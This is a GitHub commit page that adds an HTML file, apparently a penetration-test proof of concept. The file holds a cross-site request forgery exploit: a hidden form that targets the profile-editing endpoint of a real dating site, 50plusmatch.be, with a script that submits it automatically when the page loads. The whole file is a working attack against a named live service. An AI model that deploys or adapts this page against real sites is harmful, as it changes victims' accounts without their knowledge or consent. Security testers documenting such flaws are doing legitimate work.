Skip to content

Commit 92e1921

Browse files
authored
Add files via upload
1 parent ababc48 commit 92e1921

1 file changed

Lines changed: 23 additions & 0 deletions

File tree

assets/csrf0.html

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
<!DOCTYPE html>
2+
<html>
3+
<body>
4+
<form action="https://www.50plusmatch.be/profile/profile_new.php" method="POST" id="csrfForm">
5+
<input type="hidden" name="tx_pro_nickname" value="pentest2">
6+
<input type="hidden" name="hi_pro_sitecode" value="M4M">
7+
<input type="hidden" name="new_subscr" value="N">
8+
<input type="hidden" name="goto_next" value="Y">
9+
<input type="hidden" name="page_no" value="step2">
10+
<input type="hidden" name="message" value="brokenauth">
11+
<input type="hidden" name="messag" value="tretrytryrasldsdshhfjs">
12+
<input type="hidden" name="relatexpect" value="sdsdhdhjakkkds">
13+
<input type="hidden" name="message_looks" value="">
14+
<input type="hidden" name="message_free" value="">
15+
<input type="hidden" name="message_holiday" value="">
16+
<input type="hidden" name="btnSubmit" value="submit-value">
17+
</form>
18+
19+
<script>
20+
document.getElementById("csrfForm").submit();
21+
</script>
22+
</body>
23+
</html>

0 commit comments

Comments
 (0)